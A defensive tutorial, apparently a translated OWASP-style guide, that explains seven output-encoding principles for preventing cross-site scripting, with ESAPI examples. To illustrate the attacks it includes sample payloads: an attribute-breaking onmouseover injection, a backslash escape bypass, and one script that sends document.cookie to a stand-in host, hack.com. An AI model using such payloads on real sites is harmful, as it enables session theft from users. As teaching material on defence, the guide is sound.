Seven principles for defending against XSS

Source: Internet
Author: User

This article covers a set of principles for defending against XSS attacks. It assumes that readers understand XSS, or at least how XSS vulnerabilities arise. If you are not familiar with the topic, first read these two articles: "Stored and reflected XSS Attack" and "DOM Based XSS".

An attacker can use an XSS vulnerability to send an attack script to a user, and the user's browser will execute it because the browser has no way of knowing that the script is untrusted. To the browser, the script appears to come from a trusted server, so the script can legitimately read cookies and other sensitive information that the current site stores in the browser, and in some cases can even discover what software is installed on the user's computer. Such scripts can also rewrite the HTML page to carry out phishing attacks.

Although XSS vulnerabilities arise for many reasons and can be exploited in many different ways, following the defensive principles in this article will still prevent XSS attacks.

One might ask: the core of XSS defense is simply to encode untrusted data on output, and today's popular web frameworks, such as Rails, HTML-encode untrusted data by default, so do we still need to spend time learning how to defend against XSS? The answer is yes. For untrusted data placed in the body of an HTML page, HTML encoding is sufficient to protect against XSS, and HTML-encoded data placed in an HTML tag attribute does not produce an XSS vulnerability either (provided the attribute value is correctly quoted). However, if you put HTML-encoded data anywhere inside a <script> tag, in an event-handling attribute of an HTML tag (such as onmouseover), in CSS, or in a URL, XSS attacks are still possible, because HTML encoding does not help in those contexts. So even if you use HTML encoding everywhere, XSS vulnerabilities can still exist. The following principles explain which encoding to use in which place to eliminate XSS vulnerabilities.

Principle 1: Do not insert any untrusted data into the page unless it has been encoded according to the following principles

The first principle is the "secure by default" principle: do not insert any untrusted data into an HTML page unless the data has been encoded according to the principles below.

This principle exists because there are too many places in HTML where XSS vulnerabilities can form, and each forms for a different reason: some occur in the content of HTML tags, some in tag attributes, some in <script> blocks on the page, and some even in CSS. In addition, browsers parse pages slightly differently, so some vulnerabilities appear only in specific browsers. If you try to escape or replace untrusted data with an XSS filter instead, the filter rules become extremely complex, hard to maintain, and at risk of being bypassed.

So I cannot think of any good reason to insert untrusted data directly into an HTML page. Even with an XSS filter in place, the risk of creating an XSS vulnerability remains very high.

<script> ... do not insert untrusted data directly here ... </script>

Inserted directly into a script tag

<!-- ... do not insert untrusted data directly here ... -->

Inserted into an HTML comment

<div ... do not insert untrusted data directly here ...="..."></div>

Inserted as the attribute name of an HTML tag

<div name="... do not insert untrusted data directly here ..."></div>

Inserted into the attribute value of an HTML tag

<... do not insert untrusted data directly here ... href="..."></a>

Used as the name of an HTML tag

<style> ... do not insert untrusted data directly here ... </style>

Inserted directly into CSS

Most importantly, do not include any untrusted third-party JavaScript in the page. Once included, such a script can manipulate your HTML pages, steal sensitive information, launch phishing attacks, and so on.

Principle 2: HTML-entity-encode untrusted data before inserting it between HTML tags

It is important to distinguish inserting untrusted data between HTML tags from inserting it into HTML tag attributes, because the two require different types of encoding. When you do need to insert untrusted data between HTML tags, first HTML-entity-encode it. For example, we often need to insert user-submitted data into tags such as div, p, and td; because that data is untrusted, it must be HTML-entity-encoded. Many web frameworks provide HTML entity encoding functions that we only need to call, and some frameworks are "smarter": Rails, for example, HTML-encodes all data inserted into an HTML page by default. Although this does not fully defend against XSS, it does reduce the burden on developers.

<body> ... HTML-entity-encode untrusted data before inserting it here ... </body>

<div> ... HTML-entity-encode untrusted data before inserting it here ... </div>

<p> ... HTML-entity-encode untrusted data before inserting it here ... </p>

The same applies when inserting untrusted data between any other HTML tags.

[Encoding Rules]

So what exactly does HTML entity encoding do? It encodes the following six special characters:

& --> &amp;

< --> &lt;

> --> &gt;

" --> &quot;

' --> &#x27;

/ --> &#x2F;

Two points need special mention:

    • Encoding the single quotation mark (') as &apos; is not recommended, because &apos; is not part of the HTML 4 specification (it comes from XML and XHTML)
    • The slash (/) needs to be encoded because it helps an attacker close the current HTML tag during an XSS attack

We recommend the ESAPI library provided by OWASP, which offers a rigorous set of functions for the various security encodings. For the current example, you can use:

String encodedContent = ESAPI.encoder().encodeForHTML(request.getParameter("input"));
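For readers who want to see what the six-character rule amounts to, here is a minimal sketch in plain Java. The class and method names (HtmlEntityEncoder, encodeForHtml) are hypothetical and are not part of ESAPI; in a real application the library encoder is the better choice.

```java
// Hypothetical helper for illustration only; not part of ESAPI.
final class HtmlEntityEncoder {

    private HtmlEntityEncoder() {}

    /** Replaces the six special characters listed above with HTML entities. */
    static String encodeForHtml(String untrusted) {
        StringBuilder out = new StringBuilder(untrusted.length() + 16);
        for (int i = 0; i < untrusted.length(); i++) {
            char c = untrusted.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                case '/':  out.append("&#x2F;"); break;
                default:   out.append(c);        // every other character is left as-is
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // The encoded text can be placed between tags such as <div> ... </div>.
        System.out.println("<div>" + encodeForHtml("<script>alert('xss')</script>") + "</div>");
    }
}
```

This output is only suitable for the position between HTML tags; the other contexts described below need their own encodings.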

Principle 3: HTML-attribute-encode untrusted data before inserting it into HTML attributes

This principle means that when you insert untrusted data into the value of an HTML attribute (for example width, name, or value), you should HTML-attribute-encode the data. Note, however, that this rule does not apply when inserting data into an event-handling attribute of an HTML tag (such as onmouseover); data there should be JavaScript-encoded according to Principle 4 below.

<div attr=... HTML-attribute-encode untrusted data before inserting it here ...></div>

The attribute value is not quoted (not recommended)

<div attr='... HTML-attribute-encode untrusted data before inserting it here ...'></div>

The attribute value uses single quotation marks

<div attr="... HTML-attribute-encode untrusted data before inserting it here ..."></div>

The attribute value uses double quotation marks

[Encoding Rules]

Except for alphanumeric characters, encode every character whose character code is less than 256. The encoded output has the format &#xHH; (it begins with &#x, HH is the hexadecimal number corresponding to the character, and the semicolon is the terminator).

The encoding rules are this strict because developers sometimes forget to enclose attribute values in quotation marks. If an attribute value is not quoted, an attacker can easily close the current attribute and then insert an attack script. For example, if the attribute is unquoted and the data is not strictly encoded, a single space character is enough to close the current attribute. Consider the following attack:

Suppose the HTML code is this:

<div width=$INPUT> ... content ... </div>

An attacker could construct an input like this:

x onmouseover="javascript:alert(/xss/)"

The final HTML in the user's browser then looks like this:

<div width=x onmouseover="javascript:alert(/xss/)"> ... content ... </div>

As soon as the user's mouse moves over this div, the attacker's script is triggered. In this case the script merely pops up an alert box, which is little more than a prank, but in a real attack the attacker would use a more destructive script, such as the following XSS payload that steals the user's cookie:

x /> <script>var img = document.createElement("img"); img.src = "http://hack.com/xss.js?" + escape(document.cookie); document.body.appendChild(img);</script> <div

Besides whitespace, the following characters can also be used to close the current attribute:

% * + , - / ; < = > ^ | ` (backtick; IE treats it as a single quotation mark)

You can use the function provided by ESAPI to encode HTML attributes:

String encodedContent = ESAPI.encoder().encodeForHTMLAttribute(request.getParameter("input"));
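The attribute encoding rule can be sketched in a few lines of plain Java. This is an illustration under stated assumptions, not ESAPI's implementation: the class and method names are hypothetical, "alphanumeric" is taken to mean ASCII letters and digits only, and characters with codes of 256 and above are passed through unchanged, as the rule above implies.

```java
// Hypothetical helper for illustration only; not part of ESAPI.
final class HtmlAttributeEncoder {

    private HtmlAttributeEncoder() {}

    /** Encodes every non-alphanumeric character below 256 as &#xHH; */
    static String encodeForHtmlAttribute(String untrusted) {
        StringBuilder out = new StringBuilder(untrusted.length() * 2);
        for (int i = 0; i < untrusted.length(); i++) {
            char c = untrusted.charAt(i);
            if (isAsciiAlphanumeric(c) || c >= 256) {
                out.append(c);
            } else {
                out.append("&#x").append(String.format("%02X", (int) c)).append(';');
            }
        }
        return out.toString();
    }

    // Assumption: only ASCII letters and digits count as alphanumeric.
    private static boolean isAsciiAlphanumeric(char c) {
        return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z');
    }

    public static void main(String[] args) {
        // The attack input from the example above, rendered into an unquoted attribute.
        String input = "x onmouseover=\"javascript:alert(/xss/)\"";
        System.out.println("<div width=" + encodeForHtmlAttribute(input) + "> ... content ... </div>");
    }
}
```

Because the space, the equals sign, and the quotation marks are all encoded, the attacker's input can no longer end the width attribute, even when the developer forgot the quotation marks.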

Principle 4: JavaScript-encode untrusted data before inserting it into a script

This principle applies mainly to dynamically generated JavaScript code, which includes script blocks as well as the event-handling attributes of HTML tags (event handlers such as onmouseover and onload). When inserting data into JavaScript code, only one placement is safe: JavaScript-encode the untrusted data and put it only in a quoted data value, for example:

<script>

var message = "<%= encodeJavaScript(@INPUT) %>";

</script>

Inserting untrusted data anywhere else in JavaScript code is quite dangerous, because an attacker can easily inject attack code.

<script>alert('... JavaScript-encode untrusted data before inserting it here ...')</script>

The value uses single quotation marks

<script>x = "... JavaScript-encode untrusted data before inserting it here ...";</script>

The value uses double quotation marks

<div onmouseover="x='... JavaScript-encode untrusted data before inserting it here ...'"></div>

The value is quoted, and the value of the event-handling attribute is quoted as well

Note that some JavaScript functions are extremely dangerous from an XSS standpoint: even if untrusted data is JavaScript-encoded, passing it to them can still produce an XSS vulnerability, for example:

<script>

window.setInterval('... even if untrusted data is JavaScript-encoded, there is still an XSS vulnerability here ...');

</script>

[Encoding Rules]

Except for alphanumeric characters, encode every character whose character code is less than 256. The encoded output has the format \xHH (it begins with \x, and HH is the hexadecimal number corresponding to the character).

When encoding untrusted data, do not take the shortcut of simply escaping special characters with a backslash (\), for example escaping a double quotation mark as \". This is unreliable for two reasons. First, when the browser parses a page it runs the HTML parser before the JavaScript parser, so inside an HTML attribute a double quotation mark can be matched by the HTML parser and close the attribute no matter what backslash precedes it. Second, an attacker can escape the escape: by supplying a backslash in front of the quotation mark, the attacker neutralizes the backslash that the escaping adds, breaks out of the data value, and continues the XSS attack. For example:

Suppose the code fragment is as follows:

<script>

var message = "$VAR";

</script>

The attacker enters:

\";alert('XSS');//

If you simply escape the double quotation mark by replacing it with \", the attacker's input ends up in the final page as:

<script>

var message = "\\";alert('XSS');//";

</script>

When the browser parses this, the two backslashes form an escaped backslash, so the double quotation mark that follows them closes the string opened by the first double quotation mark. The subsequent alert('XSS') is then treated as ordinary JavaScript and is executed.

You can use the function provided by ESAPI to JavaScript-encode data:

String encodedContent = ESAPI.encoder().encodeForJavaScript(request.getParameter("input"));
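The difference between the backslash shortcut and the \xHH rule is easier to see side by side. The sketch below is plain Java with hypothetical names (JavaScriptEncoder, naiveEscape, encodeForJavaScript); it is not ESAPI's implementation. It assumes that "alphanumeric" means ASCII letters and digits and passes characters with codes of 256 and above through unchanged, which a production encoder would typically also handle.

```java
// Hypothetical helper for illustration only; not part of ESAPI.
final class JavaScriptEncoder {

    private JavaScriptEncoder() {}

    /** UNSAFE shortcut, shown only for comparison: puts a backslash before each double quote. */
    static String naiveEscape(String untrusted) {
        return untrusted.replace("\"", "\\\"");
    }

    /** Encodes every non-alphanumeric character below 256 in the \xHH format. */
    static String encodeForJavaScript(String untrusted) {
        StringBuilder out = new StringBuilder(untrusted.length() * 2);
        for (int i = 0; i < untrusted.length(); i++) {
            char c = untrusted.charAt(i);
            boolean alphanumeric =
                (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z');
            if (alphanumeric || c >= 256) {
                out.append(c);
            } else {
                out.append("\\x").append(String.format("%02X", (int) c));
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // The attacker's input from the example above: backslash, double quote, then script.
        String attack = "\\\";alert('XSS');//";
        System.out.println("naive:   var message = \"" + naiveEscape(attack) + "\";");
        System.out.println("encoded: var message = \"" + encodeForJavaScript(attack) + "\";");
    }
}
```

With the naive escape the quotation mark survives and ends the string early; with the \xHH encoding no quotation mark or backslash from the input reaches the page in its literal form.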

Principle 5: CSS-encode untrusted data before inserting it into the style attribute

When you need to insert untrusted data into a style sheet, a style tag, or a style attribute, you need to CSS-encode the data. CSS is traditionally thought of as responsible only for page styling, but it is far more powerful than we tend to assume and can be used in a variety of attacks. Therefore, do not put untrusted data into CSS casually: allow untrusted data only in the value of a CSS property, and encode it appropriately. It is also best not to put untrusted data into complex properties such as url and behavior, or into the expression property, which is recognized only by IE and allows JavaScript to be executed.

<style>selector { property: ... CSS-encode untrusted data before inserting it here ... }</style>

<style>selector { property: "... CSS-encode untrusted data before inserting it here ..." }</style>

<span style="property: ... CSS-encode untrusted data before inserting it here ..."> ... </span>

[Encoding Rules]

Except for alphanumeric characters, encode every character whose character code is less than 256. The encoded output has the format \HH (it begins with \, and HH is the hexadecimal number corresponding to the character).

As with the preceding principles, when encoding untrusted data, avoid the shortcut of simply escaping double quotation marks and other special characters; attackers can find ways around such restrictions.

You can use the function provided by ESAPI for CSS encoding:

String encodedContent = ESAPI.encoder().encodeForCSS(request.getParameter("input"));
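A rough sketch of the \HH rule in plain Java follows. The names (CssEncoder, encodeForCss) are hypothetical and this is not ESAPI's implementation. One detail goes beyond the rule as stated above and is an assumption of this sketch: a single space is appended after each escape, because in CSS syntax a hex escape absorbs any hex digits that follow it, and the space acts as a terminator.

```java
// Hypothetical helper for illustration only; not part of ESAPI.
final class CssEncoder {

    private CssEncoder() {}

    /** Encodes every non-alphanumeric character below 256 as \HH followed by a space. */
    static String encodeForCss(String untrusted) {
        StringBuilder out = new StringBuilder(untrusted.length() * 2);
        for (int i = 0; i < untrusted.length(); i++) {
            char c = untrusted.charAt(i);
            boolean alphanumeric =
                (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z');
            if (alphanumeric || c >= 256) {
                out.append(c);
            } else {
                // Trailing space terminates the escape so a following "b" is not read as a hex digit.
                out.append('\\').append(String.format("%02X", (int) c)).append(' ');
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Untrusted data is allowed only in the value part of a property.
        String input = "red; background: url(javascript:alert(1))";
        System.out.println("selector { color: " + encodeForCss(input) + " }");
    }
}
```

After encoding, the semicolon, colon, and parentheses in the input are escapes inside a single value, so the input cannot start a new declaration or call url() or expression().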

Principle 6: URL-encode untrusted data before inserting it into an HTML URL

When you need to insert untrusted data into a URL in an HTML page, URL-encode it, as follows:

<a href="http://www.abcd.com?param=... URL-encode untrusted data before inserting it here ..."> Link Content </a>

[Encoding Rules]

Except for alphanumeric characters, encode every character whose character code is less than 256. The encoded output has the format %HH (it begins with %, and HH is the hexadecimal number corresponding to the character).

Two points require special attention when URL-encoding:

1) URL attributes should enclose their value in quotation marks; otherwise an attacker can easily break out of the current attribute and insert attack code after it.

2) Do not URL-encode an entire URL. When untrusted data supplies a whole URL for href, src, or another URL-based attribute, validate the protocol at the start of the data instead; otherwise an attacker can change the URL's protocol, for example from HTTP to the data: pseudo-protocol or the javascript: pseudo-protocol.

You can use the function provided by ESAPI for URL encoding:

String encodedContent = ESAPI.encoder().encodeForURL(request.getParameter("input"));

ESAPI also provides functions for validating untrusted data. Here we can use one to check whether the untrusted data really is a URL:

String userProvidedURL = request.getParameter("userProvidedURL");
boolean isValidURL = ESAPI.validator().isValidInput("URLContext", userProvidedURL, "URL", 255, false);
if (isValidURL) {

<a href="<%= ESAPI.encoder().encodeForHTMLAttribute(userProvidedURL) %>"></a>

}
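The two cases above (encoding a parameter value, and validating the protocol of a whole URL) can be sketched with the Java standard library alone. The names UrlSafety, encodeForUrlParam, and hasAllowedScheme are hypothetical, and the allowlist of http and https is an assumption for illustration. The sketch percent-encodes the UTF-8 bytes of the input, which extends the %HH rule to characters above 255.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.nio.charset.StandardCharsets;
import java.util.Locale;

// Hypothetical helper for illustration only; not part of ESAPI.
final class UrlSafety {

    private UrlSafety() {}

    /** Percent-encodes every byte that is not an ASCII letter or digit. */
    static String encodeForUrlParam(String untrusted) {
        StringBuilder out = new StringBuilder(untrusted.length() * 3);
        for (byte b : untrusted.getBytes(StandardCharsets.UTF_8)) {
            int v = b & 0xFF;
            boolean alphanumeric =
                (v >= '0' && v <= '9') || (v >= 'A' && v <= 'Z') || (v >= 'a' && v <= 'z');
            if (alphanumeric) {
                out.append((char) v);
            } else {
                out.append('%').append(String.format("%02X", v));
            }
        }
        return out.toString();
    }

    /** Accepts a whole URL only if it parses and its scheme is on the allowlist. */
    static boolean hasAllowedScheme(String untrustedUrl) {
        try {
            String scheme = new URI(untrustedUrl.trim()).getScheme();
            if (scheme == null) {
                return false; // relative URLs are rejected in this sketch
            }
            String lower = scheme.toLowerCase(Locale.ROOT);
            return lower.equals("http") || lower.equals("https"); // assumed allowlist
        } catch (URISyntaxException e) {
            return false; // anything that does not parse is rejected
        }
    }

    public static void main(String[] args) {
        System.out.println("http://www.abcd.com?param=" + encodeForUrlParam("a b&c=d"));
        System.out.println(hasAllowedScheme("javascript:alert(1)"));
    }
}
```

A URL that passes hasAllowedScheme still has to be HTML-attribute-encoded before it is written into href, as in the ESAPI example above.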

Principle 7: Use an XSS rule engine to encode and filter rich text

Web applications often let users enter rich text, for example in forum posts and blog articles. User-submitted rich text often contains HTML tags, or even JavaScript, and if it is not properly encoded and filtered it creates an XSS vulnerability. However, we cannot forbid rich text simply out of fear of XSS vulnerabilities, because that would badly damage the user experience.

Because rich text is a special case, we can use an XSS rule engine to filter user input: allow only safe HTML tags such as <b>, <i>, and <p>, and HTML-encode everything else. Note that content filtered by the rule engine may only be placed inside safe HTML tags such as <div> and <p>. Do not put it in an HTML attribute value, in an HTML event-handling attribute, or in a <script> tag.

Recommended XSS rule filtering engines: OWASP AntiSamy or the OWASP Java HTML Sanitizer

Summary

Because XSS vulnerabilities can occur in many places, and for different reasons in each, defending against XSS means doing the right thing in the right place: applying the encoding that matches wherever the untrusted data is placed. For example, data placed between <div> tags needs HTML entity encoding, data placed in a <div> tag's attributes needs HTML attribute encoding, and so on.

XSS attacks keep evolving. The principles described above cover almost all of the places where XSS can occur in web applications, but we still cannot be complacent. To make web applications more secure, we can combine these principles with other defenses that strengthen XSS protection or limit the damage:

    • Validate user input. For example, a text box for an email address should accept only correctly formatted email addresses, and a text box for a mobile phone number should accept only digits in the correct format. This validation must be done at least on the server side, because browser-side validation can be bypassed; to improve the user experience and reduce server load, it is best to do it on the browser side as well.
    • Add the HttpOnly flag to cookies. The goal of many XSS attacks is to steal user cookies, which often contain authentication information (such as a session ID); once a cookie is stolen, the attacker can impersonate the user and take over the account. Stealing cookies generally relies on JavaScript reading the cookie, and the HttpOnly flag tells the browser that the flagged cookie must not be read or modified by any script. So even if the web application has an XSS vulnerability, cookie information is better protected and the damage is reduced.
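Both supplementary defenses can be sketched in plain Java. Everything named here is hypothetical: the class DefenseInDepth, the deliberately simple email and phone patterns (real formats vary by application and country), and the cookie name SESSIONID. In a servlet application the same flag is normally set through the Cookie class's setHttpOnly method rather than by building the header by hand.

```java
import java.util.regex.Pattern;

// Hypothetical helper for illustration only.
final class DefenseInDepth {

    private DefenseInDepth() {}

    // Assumed formats; adjust to the rules your application actually needs.
    private static final Pattern EMAIL =
        Pattern.compile("[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}");
    private static final Pattern PHONE = Pattern.compile("[0-9]{7,15}");

    /** Server-side check that the whole input looks like an email address. */
    static boolean isValidEmail(String input) {
        return input != null && EMAIL.matcher(input).matches();
    }

    /** Server-side check that the whole input consists of 7 to 15 digits. */
    static boolean isValidPhone(String input) {
        return input != null && PHONE.matcher(input).matches();
    }

    /**
     * Builds a Set-Cookie header value with the HttpOnly flag.
     * The session ID is assumed to be generated by the server, not taken from user input.
     */
    static String sessionCookieHeader(String sessionId) {
        return "SESSIONID=" + sessionId + "; Path=/; HttpOnly";
    }

    public static void main(String[] args) {
        System.out.println(isValidEmail("<script>alert(1)</script>"));
        System.out.println("Set-Cookie: " + sessionCookieHeader("abc123"));
    }
}
```

Validation of this kind narrows what an attacker can submit, but it complements the output encoding described in the principles above and does not replace it.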

Web applications are becoming more complex and increasingly prone to vulnerabilities of all kinds, not just XSS. No silver bullet solves every security problem at once; we can only stay alert to each kind of vulnerability and defend against it specifically.
